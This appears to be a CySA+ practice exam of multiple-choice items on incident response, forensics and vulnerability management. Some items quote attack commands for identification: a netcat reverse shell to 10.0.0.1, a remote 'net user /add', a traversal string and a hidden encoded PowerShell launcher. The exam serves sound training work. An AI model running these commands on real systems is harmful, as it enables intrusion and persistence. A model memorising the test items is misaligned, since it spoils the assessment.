CYSA+ 003

An analyst is imaging a hard drive that was obtained from the system of an employee who is suspected of going rogue. The analyst notes that the initial hash of the evidence drive does not match the resultant hash of the imaged copy. Which of the following best describes the reason for the conflicting investigative findings?. Chain of custody was not maintained for the evidence drive. Legal authorization was not obtained prior to seizing the evidence drive. Data integrity of the imaged drive could not be verified. Evidence drive imaging was performed without a write blocker.

The analyst reviews the following endpoint log entry: invoke-command -ComputerName clientcomputer1 -Credential xyzcompany\administrator -ScriptBlock {HOSTName} clientcomputer1 invoke-command -ComputerName clientcomputer1 -Credential xyzcompany\administrator -ScriptBlock {net user /add invoke_u1} The command completed successfully. Which of the following has occurred?. Registry change. Rename computer. New account introduced. Privilege escalation.

A development team is preparing to roll out a beta version of a web application and wants to quickly test for vulnerabilities, including SQL injection, path traversal, and cross-site scripting. Which of the following tools would the security team most likely recommend to perform this test?. Hashcat. OpenVas. OWASP ZAP. Nmap.

A security analyst detected the following suspicious activity: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f Which of the following most likely describes the activity?. Network pivoting. Host scanning. Privilege escalation. Reverse shell.

An analyst is designing a message system for a bank. The analyst wants to include a feature that allows the recipient of a message to prove to a third party that the message came from the sender. Which of the following information security goals is the analyst most likely trying to achieve?. Non-repudiation. Authentication. Authorization. Integrity.

Before adopting a disaster recovery plan, some team members need to gather in a room to review the written scenarios. Which of the following best describes what the team is doing?. Simulation. Tabletop exercise. Full test. Parallel test.

Which of the following entities should an incident manager work with to ensure correct processes are adhered to when communicating incident reporting to the general public, as a best practice?. Law enforcement and Governance. Legal and Public relations. Manager and Public relations. Human resources and Manager.

Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following tools should be used to maintain the integrity of the mobile phone while it is transported?. Signal-shielded bag and Tamper-evident seal. Thumb drive and Crime scene tape. Write blocker and Drive duplicator.

During the rollout of a patch to the production environment, it was discovered that required connections to remote systems are no longer possible. Which of the following steps would have most likely revealed this gap?. Implementation. User acceptance testing. Validation. Rollback.

An organization has tracked several incidents that are listed in the following table: Start time Detection time Time elapsed in minutes 7:20 a.m. 10:30 a.m. 180 12:00 a.m. 2:30 a.m. 150 9:25 a.m. 12:15 p.m. 170 3:25 p.m. 5:45 p.m. 140 Which of the following is the organization’s MTTD?. 140. 150. 160. 180.

A security analyst has found a moderate-risk item in an organization’s point-of-sale application. The organization is currently in a change freeze window and has decided that the risk is not high enough to correct at this time. Which of the following inhibitors to remediation does this scenario illustrate?. Service-level agreement. Business process interruption. Degrading functionality. Proprietary system.

While reviewing the web server logs, a security analyst notices the following snippet: ..\../..\../boot.ini Which of the following is being attempted?. Directory traversal. Remote file inclusion. Cross-site scripting. Remote code execution. Enumeration of /etc/passwd.

A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?. Data enrichment. Security control plane. Threat feed combination. Single pane of glass.

Exploit code for a recently disclosed critical software vulnerability was publicly available for download for several days before being removed. Which of the following CVSS v.3.1 temporal metrics was most impacted by this exposure?. Remediation level. Exploit code maturity. Report confidence. Availability.

Which of the following in the digital forensics process is considered a critical activity that often includes a graphical representation of process and operating system events?. Registry editing. Network mapping. Timeline analysis. Write blocking.

Which of the following best describes the importance of KPIs in an incident response exercise?. To identify the personal performance of each analyst. To describe how incidents were resolved. To reveal what the team needs to prioritize. To expose which tools should be used.

An organization is conducting a pilot deployment of an e-commerce application. The application’s source code is not available. Which of the following strategies should an analyst recommend to evaluate the security of the software?. Static testing. Vulnerability testing. Dynamic testing. Penetration testing.

A security team needs to demonstrate how prepared the team is in the event of a cyberattack. Which of the following would best demonstrate a real-world incident without impacting operations?. Review lessons-learned documentation and create a playbook. Gather all internal incident response party members and perform a simulation. Deploy known malware and document the remediation process. Schedule a system recovery to the DR site for a few applications.

A SOC receives several alerts indicating user accounts are connecting to the company’s identity provider through non-secure communications. User credentials for accessing sensitive, business-critical systems could be exposed. Which of the following logs should the SOC use when determining malicious intent?. DNS. tcpdump. Directory. IDS.

A vulnerability scan of a web server that is exposed to the internet was recently completed. A security analyst is reviewing the resulting vector strings: Vulnerability 1: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L Vulnerability 2: CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H Vulnerability 3: CVSS:3.0/AV:A/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:L Vulnerability 4: CVSS:3.0/AV:P/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:L Which of the following vulnerabilities should be patched first?. Vulnerability 1. Vulnerability 2. Vulnerability 3. Vulnerability 4.

Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered. Which of the following is the best solution to decrease the inconsistencies?. Implementing credentialed scanning. Changing from a passive to an active scanning approach. Implementing a central place to manage IT assets. Performing agentless scanning.

An organization plans to use an advanced machine-learning tool as a central collection server. The tool will perform data aggregation and analysis. Which of the following should the organization implement?. SIEM. Firewalls. Syslog server. Flow analysis.

A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in the past month. Which of the following public MITRE repositories would be best to review?. Cyber Threat Intelligence. Common Vulnerabilities and Exposures. Cyber Analytics Repository. ATT&CK.

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed: Alerts (17) Absence of Anti-CSRF Tokens Content Security Policy (CSP) Header Not Set (6) Cross-Domain Misconfiguration (34) Directory Browsing (11) Missing Anti-clickjacking Header (2) Cookie No HttpOnly Flag (4) Cookie Without Secure Flag Cookie with SameSite Attribute None (2) Cookie without SameSite Attribute (5) Cross-Domain JavaScript Source File Inclusion Timestamp Disclosure - Unix (569) X-Content-Type-Options Header Missing (42) CORS Header Information Disclosure - Sensitive Information in URL (2) Information Disclosure - Suspicious Comments (43) Loosely Scoped Cookie (5) Re-examine Cache-control Directives (33) Which of the following tuning recommendations should the security analyst share?. Set an HttpOnly flag to force communication by HTTPS. Block requests without an X-Frame-Options header. Configure an Access-Control-Allow-Origin header to authorized domains. Disable the cross-origin resource sharing header.

Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output: Nmap scan report for officerokuplayer.lan (192.168.86.22) Host is up (0.11s latency). All 100 scanned ports on officerokuplayer.lan (192.168.86.22) are filtered MAC Address: B8:3E:59:86:1A:13 (Roku) Nmap scan report for p4wnpi_aloa.lan (192.168.86.56) Host is up (0.022s latency). Not shown: 96 closed ports PORT STATE SERVICE 22/tcp open ssh 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 8000/tcp open http-alt MAC Address: B8:27:EB:D0:8E:D1 (Raspberry Pi Foundation) Nmap scan report for wh4dc-749gy.lan (192.168.86.152) Host is up (0.033s latency). Not shown: 95 filtered ports PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 5357/tcp open wsdapi MAC Address: 38:BA:F8:E3:41:C5 (Intel Corporate) Nmap scan report for xlaptop.lan (192.168.86.249) Host is up (0.024s latency). Not shown: 93 filtered ports PORT STATE SERVICE 22/tcp open ssh 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 5357/tcp open wsdapi MAC Address: 64:00:6A:8E:D8:F5 (Dell) Nmap scan report for imaging.lan (192.168.86.150) Host is up (0.0013s latency). Not shown: 95 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp open ms-wbt-server 5357/tcp open wsdapi MAC Address: 38:BA:F8:F4:32:CA (Intel Corporate). wh4dc-748gy.lan (192.168.86.152). officerckuplayer.lan (192.168.86.22). imaging.lan (192.168.86.150). xlaptop.lan (192.168.86.249). p4wnp1_aloa.lan (192.168.86.56).

A corporation wants to implement an agent-based endpoint solution to help: • Flag various threats • Review vulnerability feeds • Aggregate data • Provide real-time metrics by using scripting languages Which of the following tools should the corporation implement to reach this goal?. DLP. Hueristics. SOAR. NAC.

A new SOC manager reviewed findings regarding the strengths and weaknesses of the last tabletop exercise in order to make improvements. Which of the following should the SOC manager utilize to improve the process?. The most recent audit report. The incident response playbook. The incident response plan. The lessons-learned register.

Following an attack, an analyst needs to provide a summary of the event to the Chief Information Security Officer. The summary needs to include the who-what-when information and evaluate the effectiveness of the plans in place. Which of the following incident management life cycle processes does this describe?. Business continuity plan. Lessons learned. Forensic analysis. Incident response plan.

Which of the following most accurately describes the Cyber Kill Chain methodology?. It is used to correlate events to ascertain the TTPs of an attacker. It is used to ascertain lateral movements of an attacker, enabling the process to be stopped. It provides a clear model of how an attacker generally operates during an intrusion and the actions to take at each stage. It outlines a clear path for determining the relationships between the attacker, the technology used, and the target.

After a recent vulnerability report for a server is presented, a business must decide whether to secure the company’s web-based storefront or shut it down. The developer is not able to fix the zero-day vulnerability because a patch does not exist yet. Which of the following is the best option for the business?. Limit the API request for new transactions until a patch exists. Take the storefront offline until a patch exists. Identify the degrading functionality. Put a WAF in front of the storefront.

During a tabletop exercise, engineers discovered that an ICS could not be updated due to hardware versioning incompatibility. Which of the following is the most likely cause of this issue?. Legacy system. Business process interruption. Degrading functionality. Configuration management.

Which of the following is the best reason to implement an MOU?. To create a business process for configuration management. To allow internal departments to understand security responsibilities. To allow an expectation process to be defined for legacy systems. To ensure that all metrics on service levels are properly reported.

Which of the following documents sets requirements and metrics for a third-party response during an event?. BIA. DRP. SLA. MOU.

A SOC analyst wants to improve the proactive detection of malicious emails before they are delivered to the destination inbox. Which of the following is the best approach the SOC analyst can recommend?. Install UEBA software on the network. Validate and quarantine emails with invalid DKIM and SPF headers. Implement an EDR system on each endpoint. Deploy a DLP platform to block unauthorized and suspicious content.

Which of the following is a benefit of the Diamond Model of Intrusion Analysis?. It provides analytical pivoting and identifies knowledge gaps. It guarantees that the discovered vulnerability will not be exploited again in the future. It provides concise evidence that can be used in court. It allows for proactive detection and analysis of attack events.

When starting an investigation, which of the following must be done first?. Notify law enforcement. Secure the scene. Seize all related evidence. Interview the witnesses.

An incident responder was able to recover a binary file through the network traffic. The binary file was also found in some machines with anomalous behavior. Which of the following processes most likely can be performed to understand the purpose of the binary file?. File debugging. Traffic analysis. Reverse engineering. Machine isolation.

A manufacturing company’s assembly line machinery only functions on an end-of-life OS. Consequently, no patches exist for several highly exploitable OS vulnerabilities. Which of the following is the best mitigating control to reduce the risk of these current conditions?. Enforce strict network segmentation to isolate vulnerable systems from the production network. Increase the system resources for vulnerable devices to prevent denial of service. Perform penetration testing to verify the exploitability of these vulnerabilities. Develop in-house patches to address these vulnerabilities.

Which of the following will most likely cause severe issues with authentication and logging?. Virtualization. Multifactor authentication. Federation. Time synchronization.

Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical vulnerabilities should be patched within 24 hours. After sending a notification to the asset owners, the patch cannot be deployed due to planned, routine system upgrades. Which of the following is the best method to remediate the bugs?. Reschedule the upgrade and deploy the patch. Request an exception to exclude the patch from installation. Update the risk register and request a change to the SLA. Notify the incident response team and rerun the vulnerability scan.

A company is in the middle of an incident, and customer data has been breached. Which of the following should the company contact first?. Media. Public relations. Law enforcement. Legal.

A list of IoCs released by a government security organization contains the SHA-256 hash for a Microsoft-signed legitimate binary, svchost.exe. Which of the following best describes the result if security teams add this indicator to their detection signatures?. This indicator would fire on the majority of Windows devices. Malicious files with a matching hash would be detected. Security teams would detect rogue svchost.exe processes in their environment. Security teams would detect event entries detailing execution of known-malicious svchost.exe processes.

A Chief Information Security Officer wants to lock down the users’ ability to change applications that are installed on their Windows systems. Which of the following is the best enterprise-level solution?. HIPS. GPO. Registry. DLP.

An employee received a phishing email that contained malware targeting the company. Which of the following is the best way for a security analyst to get more details about the malware and avoid disclosing information?. Upload the malware to the VirusTotal website. Share the malware with the EDR provider. Hire an external consultant to perform the analysis. Use a local sandbox in a microsegmented environment.

A Chief Finance Officer receives an email from someone who is possibly impersonating the company’s Chief Executive Officer and requesting a financial operation. Which of the following should an analyst use to verify whether the email is an impersonation attempt?. PKI. MFA. SMTP. DKIM.

An analyst is investigating a phishing incident and has retrieved the following as part of the investigation: cmd.exe /c c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile - EncodedCommand Which of the following should the analyst use to gather more information about the purpose of this command?. Echo the command payload content into ‘base64 -d‘. Execute the command from a Windows VM. Use a command console with administrator privileges to execute the code. Run the command as an unprivileged user from the analyst workstation.

Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?. The lead should review what is documented in the incident response policy or plan. Management level members of the CSIRT should make that decision. The lead has the authority to decide who to communicate with at anytime. Subject matter experts on the team should communicate with others within the specified area of expertise.

An organization’s threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?. Disable administrative accounts for any operations. Implement MFA requirements for all internal resources. Harden systems by disabling or removing unnecessary services. Implement controls to block execution of untrusted applications.

When undertaking a cloud migration of multiple SaaS applications, an organization’s systems administrators struggled with the complexity of extending identity and access management to cloud-based assets. Which of the following service models would have reduced the complexity of this project?. OpenID. SASE. ZTNA. SWG.

A security analyst reviews the following results of a Nikto scan: Here's the text from the terminal output: - Server: Apache - Root page / redirects to: https://ww.proz.com/ - No CGI Directories found (use -C and -f to force check all possible dirs) - File/dir '/crawler-pit/' in robots.txt returned a non-forbidden or redirect HTTP code (200) - File/dir '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200) - File/dir '/profile/s/' in robots.txt returned a non-forbidden or redirect HTTP code (200) - File/dir '/profiles//' in robots.txt returned a non-forbidden or redirect HTTP code (200) - File/dir '/profile/?/' in robots.txt returned a non-forbidden or redirect HTTP code (200) - File/dir '/translator/?/' in robots.txt returned a non-forbidden or redirect HTTP code (200) - File/dir '/profile/1273295/' in robots.txt returned a non-forbidden or redirect HTTP code (200) - File/dir '/?sp=login/' in robots.txt returned a non-forbidden or redirect HTTP code (200) - File/dir '/?sp=404/' in robots.txt returned a non-forbidden or redirect HTTP code (200) - File/dir '/translator/322254/' in robots.txt returned a non-forbidden or redirect HTTP code (500) - "robots.txt" contains 10 entries which should be manually viewed. - Lines - /crossdomain.xml contains 1 line which should be manually viewed for improper domains or wildcards. - Server is using a wildcard certificate '*.proz.com' - DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details. - /xboard/: XBoard Forum 0.3.0 and error have a security problem in forum_edit.php, forum_post.php and forum_reply.php - /lists/admin/: PHPList pre 2.6.4 contains a number of vulnerabilities including remote administrative access, harvesting user info and more. Default login is admin/phplist - /splashadmin.php: Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely. - /sxdefs/: Siteseed pre 1.4.2 has 'major' security problems. - /sxhome/: Siteseed pre 1.4.2 has 'minor' security problems. - /tiki/: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin - /tiki/tiki-install.php: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin - /cgi-bin/infosrch.cgi: See RFP 9001: www.wiretrip.net - OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DOS was not attempted. - OSVDB-637: /-root/: Allowed to browse root's home directory. - wti.cgi/warp: cross site IBIX 6.2: allows to view directories - /forums//admin/config.php: PHP Config file may contain database IDs and passwords. - /forums//adm/config.php: PHP Config file may contain database IDs and passwords - /forums//administrator/config.php: PHP Config file may contain database IDs and passwords. Which of the following should the security administrator investigate next?. tiki. phpList. shtml.exe. sshome.

Which of the following explains the importance of a timeline when providing an incident response report?. The timeline contains a real-time record of an incident and provides information that helps to simplify a postmortem analysis. An incident timeline provides the necessary information to understand the actions taken to mitigate the threat or risk. The timeline provides all the information, in the form of a timetable, of the whole incident response process including actions taken. An incident timeline presents the list of commands executed by an attacker when the system was compromised, in the form of a timetable.